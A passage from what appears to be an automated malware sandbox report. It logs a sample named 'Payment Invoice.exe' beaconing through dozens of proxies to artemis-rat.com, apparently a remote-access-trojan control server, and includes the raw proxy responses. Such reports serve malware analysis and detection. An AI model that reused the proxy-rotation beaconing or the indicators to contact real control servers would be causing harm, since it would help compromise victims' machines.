                                                                622192.168.2.45187067.43.228.25398277076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.924757957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.399899006 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                623192.168.2.45172462.141.70.118807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.925308943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.310770988 CET529INHTTP/1.1 501 Not Implemented
                                                                Access-Control-Allow-Origin: *
                                                                Content-Type: text/html
                                                                Content-Length: 357
                                                                Date: Mon, 11 Mar 2024 15:05:02 GMT
                                                                Server: lighttpd/1.4.28
                                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 35 30 31 20 2d 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>501 - Not Implemented</title> </head> <body> <h1>501 - Not Implemented</h1> </body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                624192.168.2.451827140.82.35.234444447076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.925369024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:38.214817047 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                625192.168.2.451486117.160.250.16380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.925525904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.571079016 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.
                                                                Mar 11, 2024 16:15:21.250484943 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                626192.168.2.45187545.228.235.259997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.926389933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.480808973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.215198994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714593887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527503014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.323832035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214569092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.824038029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.011442900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                627192.168.2.451789193.239.58.9280817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.930327892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                628192.168.2.45168858.246.58.15090027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.935410023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.319207907 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                629192.168.2.45171236.37.244.4156787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.940474033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                630192.168.2.45193867.43.236.20317337076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.942809105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.529509068 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                631192.168.2.451868174.75.211.22241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.944772005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                632192.168.2.45125172.195.114.16941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.944828033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                633192.168.2.451792103.224.124.7580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.945117950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.373645067 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                634192.168.2.45188772.210.221.19741457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.948549032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                635192.168.2.451892174.77.111.198495477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.951225042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                636192.168.2.451794103.200.135.22941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.955274105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                637192.168.2.45123668.1.210.16341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.955610037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                638192.168.2.45188624.249.199.441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.961627960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                639192.168.2.45178685.62.218.25031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.963393927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.557969093 CET1254INHTTP/1.1 403 Forbidden
                                                                Server: squid/3.5.28
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 952
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                Content-Language: en
                                                                X-Cache: MISS from ah_test
                                                                Via: 1.1 ah_test (squid/3.5.28)
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 31 35 3a 31 35 3a 31 37 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 15:15:17 GMT</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                640192.168.2.451837147.75.34.85807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.963685989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.267797947 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3
                                                                Mar 11, 2024 16:15:17.268260956 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 03 b5 15 8a e2 af 69 86 fe 4f 8f ad cd 3d c7 cc ab 5a cd 7d 9c 83 c1 50 12 ea e2 d3 01 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: lhe iO=Z}P*,+0/$#('=<5/artemis-rat.com#&W!Jx%uFPIF ^g2.LN7C'.'2$L}KoBFF


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                641192.168.2.452034104.25.194.175807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.963836908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.119544983 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
